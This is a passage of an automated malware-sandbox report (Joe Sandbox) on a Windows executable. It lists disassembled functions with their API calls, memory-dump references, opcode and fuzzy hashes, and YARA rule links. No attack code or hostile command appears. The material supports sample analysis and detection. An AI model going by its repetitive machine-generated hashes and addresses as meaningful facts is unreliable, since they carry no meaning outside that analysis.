                                                                                  • Opcode Fuzzy Hash: 9fae85c6c7260eb8d33c4fb260ce0c7af781723c2c0286247e77dfe8e717d333
                                                                                  • Instruction Fuzzy Hash: 26014F79100108AFDFA19F64DC49FBF7B65AB21350F10452AF912D41E1DB35CD90DA5A
                                                                                  Function 004CCD6C Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?), ref: 004CCD7D
                                                                                  • GetViewportExtEx.GDI32(?,?), ref: 004CCD8A
                                                                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 004CCDAF
                                                                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 004CCDCA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ViewportWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1589084482-0
                                                                                  • Opcode ID: 6dc1426870c03277a4c4412c09169ddbc4262abf5edb58aa51d618327d54a7a2
                                                                                  • Instruction ID: e492461583df445b57674ddc4b4398b81088905cd7797d4029a3c8e1d191b289
                                                                                  • Opcode Fuzzy Hash: 6dc1426870c03277a4c4412c09169ddbc4262abf5edb58aa51d618327d54a7a2
                                                                                  • Instruction Fuzzy Hash: C4F04672400108EFEB117B65ED06CAFBBBDEF40350B10442AF88192031DB71AD50EA64
                                                                                  Function 004CCD03 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowExtEx.GDI32(?,004A9419,00000000,?,?,?,004A9419,?), ref: 004CCD14
                                                                                  • GetViewportExtEx.GDI32(?,?,?,004A9419,?), ref: 004CCD21
                                                                                  • MulDiv.KERNEL32(004A9419,00000000,00000000), ref: 004CCD46
                                                                                  • MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 004CCD61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ViewportWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1589084482-0
                                                                                  • Opcode ID: 2a8554f42c64adbb71c5e56cfbf357c2c054aac177cc889cb6511012be76e9bd
                                                                                  • Instruction ID: a5a24e5f26b3a73cb12aee5b77fcfa90d575d723469a9192f5bc45a67111f368
                                                                                  • Opcode Fuzzy Hash: 2a8554f42c64adbb71c5e56cfbf357c2c054aac177cc889cb6511012be76e9bd
                                                                                  • Instruction Fuzzy Hash: B5F04672400108EFEB117B65ED06CAFBBBDEF40350B10442AF88192031DB71AD50EA64
                                                                                  Function 004D4E44 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SysStringLen.OLEAUT32(?), ref: 004D4E4E
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,004D630A,00000000), ref: 004D4E66
                                                                                  • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 004D4E6E
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,004D630A,00000000), ref: 004D4E83
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Byte$CharMultiStringWide$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 3384502665-0
                                                                                  • Opcode ID: f56c2d1db108c7e6a2c17f8932cad3e6ac44ba88d935b79397c81371d8020a83
                                                                                  • Instruction ID: 6b5b474efe436489f9fdf0c53f25de529a98857134dd0935a10dad68845e4401
                                                                                  • Opcode Fuzzy Hash: f56c2d1db108c7e6a2c17f8932cad3e6ac44ba88d935b79397c81371d8020a83
                                                                                  • Instruction Fuzzy Hash: CFF0FE761162647F92205B579C8CCEBBF9CEE8B2F9B024526F54882101C6755800CBF5
                                                                                  Function 004D435C Relevance: 6.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.NTDLL(00526400), ref: 004D4397
                                                                                  • RtlInitializeCriticalSection.NTDLL(00000000), ref: 004D43A9
                                                                                  • RtlLeaveCriticalSection.NTDLL(00526400), ref: 004D43B2
                                                                                  • RtlEnterCriticalSection.NTDLL(00000000), ref: 004D43C4
                                                                                    • Part of subcall function 004D42C9: GetVersion.KERNEL32(?,004D436C,?,004D492E,00000010,00000000,00000100,?,?,?,004D3760,004D37C3,004D317A,004C9C8D,00000100,004C9C26), ref: 004D42DC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                                                                  • String ID:
                                                                                  • API String ID: 1193629340-0
                                                                                  • Opcode ID: 8033cbe9a189f5c6a871eee53e4fa6dcabccd6965b00afc10627ffc93ce199ca
                                                                                  • Instruction ID: 7ca8f1db5bc0bee56fa40aa34dbc59f305261ca112b03702ed41f06256ae3a9e
                                                                                  • Opcode Fuzzy Hash: 8033cbe9a189f5c6a871eee53e4fa6dcabccd6965b00afc10627ffc93ce199ca
                                                                                  • Instruction Fuzzy Hash: 76F04F3510021ADFCB20EF98ECD4967B3ACFF72316B41043BEA4182215D735B45ADAA8
                                                                                  Function 0044CF63 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 0044CF70
                                                                                  • GetWindowRect.USER32(?,?), ref: 0044CF7D
                                                                                  • PtInRect.USER32(?,?,?), ref: 0044CF8D
                                                                                  • KillTimer.USER32(?,?), ref: 0044CFA9
                                                                                    • Part of subcall function 0044D03B: RedrawWindow.USER32(?,?,00000000,00000105,?,00000000), ref: 0044D09E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: RectWindow$CursorKillRedrawTimer
                                                                                  • String ID:
                                                                                  • API String ID: 3197782695-0
                                                                                  • Opcode ID: 2dba669ed5162566945ec8a085471756ca6ca302df281d7742b98ace4d1b9622
                                                                                  • Instruction ID: e61d23b6311d94f71fae1b7f8de4a2845772245593250a8e58830b693426217f
                                                                                  • Opcode Fuzzy Hash: 2dba669ed5162566945ec8a085471756ca6ca302df281d7742b98ace4d1b9622
                                                                                  • Instruction Fuzzy Hash: A9F09072500209AFCF11AFB4DC499EFBBBDFF54305F01046AE502D6061E774A656CB98
                                                                                  Function 004D501E Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 004D5040
                                                                                  • GetTickCount.KERNEL32 ref: 004D504D
                                                                                  • CoFreeUnusedLibraries.COMBASE ref: 004D505C
                                                                                  • GetTickCount.KERNEL32 ref: 004D5062
                                                                                    • Part of subcall function 004D4FC3: CoFreeUnusedLibraries.COMBASE ref: 004D500B
                                                                                    • Part of subcall function 004D4FC3: OleUninitialize.OLE32 ref: 004D5011
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 685759847-0
                                                                                  • Opcode ID: 955ecc3c31eaffd0663e03a5dc888dfdabfbdb1ef307f09ea0864f19420a80a1
                                                                                  • Instruction ID: 1b66f069e832102d4bee7710289ea716768b6a8d079fe6c6e96ad88916987956
                                                                                  • Opcode Fuzzy Hash: 955ecc3c31eaffd0663e03a5dc888dfdabfbdb1ef307f09ea0864f19420a80a1
                                                                                  • Instruction Fuzzy Hash: 73E01231809214CBD722AB20FD5466977B0FB63311F14893BE04056265CB785C49DFE7
                                                                                  Function 00464BD4 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 340COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00464BD9
                                                                                    • Part of subcall function 00468117: __EH_prolog.LIBCMT ref: 0046811C
                                                                                    • Part of subcall function 00465E15: __EH_prolog.LIBCMT ref: 00465E1A
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0047AAD1: __EH_prolog.LIBCMT ref: 0047AAD6
                                                                                    • Part of subcall function 004603AA: __EH_prolog.LIBCMT ref: 004603AF
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                    • Part of subcall function 0044FC1E: __EH_prolog.LIBCMT ref: 0044FC23
                                                                                  Strings
                                                                                  • IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS, xrefs: 00464C4D
                                                                                  • IDS_CTRL_STATICTEXT_BOTTOMINSTRUCTIONS, xrefs: 00464FB9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Interlocked$Increment$Decrement
                                                                                  • String ID: IDS_CTRL_STATICTEXT_BOTTOMINSTRUCTIONS$IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS
                                                                                  • API String ID: 3082256980-824710809
                                                                                  • Opcode ID: 983e4cb1bbee89b0c94b8b42cef3ec86b93bd0abe4bbad7f1f79609892c68452
                                                                                  • Instruction ID: dc456a8bdffd28551670642f11887b9e4bd3c64198162a74c682401b6d146edb
                                                                                  • Opcode Fuzzy Hash: 983e4cb1bbee89b0c94b8b42cef3ec86b93bd0abe4bbad7f1f79609892c68452
                                                                                  • Instruction Fuzzy Hash: DCD1B0B1910B049FCB14DF69C846BEEBBF4FF44314F10462EE456A7281DB78AA44CBA5
                                                                                  Function 00470B28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00470B2D
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: DecrementH_prologInterlocked
                                                                                  • String ID: .ts3$MSG_UPDATE_CLIENT_ENGINE
                                                                                  • API String ID: 3164693477-4256904655
                                                                                  • Opcode ID: 1ef78f5cfc7e6bc0e7fd8ff924cc986d36ea0f9063cd2b48905eb48edc73914b
                                                                                  • Instruction ID: 7b6b29c28156bd8d929e0febf03239d7c92f7645541b7d67c10a62d3710c1908
                                                                                  • Opcode Fuzzy Hash: 1ef78f5cfc7e6bc0e7fd8ff924cc986d36ea0f9063cd2b48905eb48edc73914b
                                                                                  • Instruction Fuzzy Hash: E7B1A574915248EFCF04DFA5C985FDEBBB8AF05314F14805EF409A7282CB78AA44CB69
                                                                                  Function 0041CCD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0041CCD5
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: DecrementH_prologInterlocked
                                                                                  • String ID: %5C$0:R
                                                                                  • API String ID: 3164693477-3774500506
                                                                                  • Opcode ID: 055946ea87b835bb4d00c8ac6c3731413596cd2dfad2b92f00ab4a76e6f5f900
                                                                                  • Instruction ID: 7cf8b462d74cf47af1abb44a110676a0c43c9d130e2fbac1ca8bbaa0284976ed
                                                                                  • Opcode Fuzzy Hash: 055946ea87b835bb4d00c8ac6c3731413596cd2dfad2b92f00ab4a76e6f5f900
                                                                                  • Instruction Fuzzy Hash: A5B1717980028DEACB05EFA5C995FEFBB78AF25304F10405EF816A3182DB786749C765
                                                                                  Function 00460C73 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 232COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00460C78
                                                                                    • Part of subcall function 00468117: __EH_prolog.LIBCMT ref: 0046811C
                                                                                    • Part of subcall function 00461BEE: __EH_prolog.LIBCMT ref: 00461BF3
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0047AAD1: __EH_prolog.LIBCMT ref: 0047AAD6
                                                                                    • Part of subcall function 004603AA: __EH_prolog.LIBCMT ref: 004603AF
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  • IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS, xrefs: 00460D00
                                                                                  • IDS_CTRL_STATICTEXT_BOTTOMINSTRUCTIONS, xrefs: 00460EFA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Interlocked$DecrementIncrement
                                                                                  • String ID: IDS_CTRL_STATICTEXT_BOTTOMINSTRUCTIONS$IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS
                                                                                  • API String ID: 715401920-824710809
                                                                                  • Opcode ID: b22fef31863be77bf5a9f5e80beb013c1c177e97930952d4f88989760e82197b
                                                                                  • Instruction ID: 7da79c65dd93be7cf52303671b5940d7c7c5aa923ae1c46372f3fd819553a47c
                                                                                  • Opcode Fuzzy Hash: b22fef31863be77bf5a9f5e80beb013c1c177e97930952d4f88989760e82197b
                                                                                  • Instruction Fuzzy Hash: 85917271900B05AFD714DFAAC956ADEFBF4FF48314F10461EE02AA3281DBB96A40CB55
                                                                                  Function 004285FF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00428604
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  • __ftol.LIBCMT ref: 004286B9
                                                                                    • Part of subcall function 0040E49E: __EH_prolog.LIBCMT ref: 0040E4A3
                                                                                    • Part of subcall function 0040E49E: lstrlen.KERNEL32(?), ref: 0040E536
                                                                                    • Part of subcall function 0040E49E: lstrcpy.KERNEL32(?,?), ref: 0040E546
                                                                                    • Part of subcall function 0040E49E: lstrlen.KERNEL32(?), ref: 0040E56C
                                                                                    • Part of subcall function 0040E49E: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,?,?,?), ref: 0040E591
                                                                                    • Part of subcall function 0040E49E: GetLastError.KERNEL32 ref: 0040E59B
                                                                                    • Part of subcall function 0040E49E: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0040E5CB
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$lstrlen$CreateDecrementErrorInterlockedLastMultipleObjectsProcessWait__ftollstrcpy
                                                                                  • String ID: 0:R
                                                                                  • API String ID: 3493775157-2078724643
                                                                                  • Opcode ID: 2a1629367352763115a2870c9bd10c7d513d9ae42b31f3a0b3849c97d29c1d2e
                                                                                  • Instruction ID: d44a03b7b24bba7751bd61d5d34618116fb83859770f94f7d03436ead19a2939
                                                                                  • Opcode Fuzzy Hash: 2a1629367352763115a2870c9bd10c7d513d9ae42b31f3a0b3849c97d29c1d2e
                                                                                  • Instruction Fuzzy Hash: 4B51F636915215AADB04F7B6EC86FFE77A89F15724F20011FF101A61C2DF7C5A81826D
                                                                                  Function 0047005A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 196COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0047005F
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                    • Part of subcall function 004C613F: __EH_prolog.LIBCMT ref: 004C6144
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 004C281A: __EH_prolog.LIBCMT ref: 004C281F
                                                                                    • Part of subcall function 004C61B3: lstrlen.KERNEL32(00000000,005108DC,?,?,004098A7,?,005108DC,00000000,?,00000000,00510870,00000000,?,?,?,00000002), ref: 004C61DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
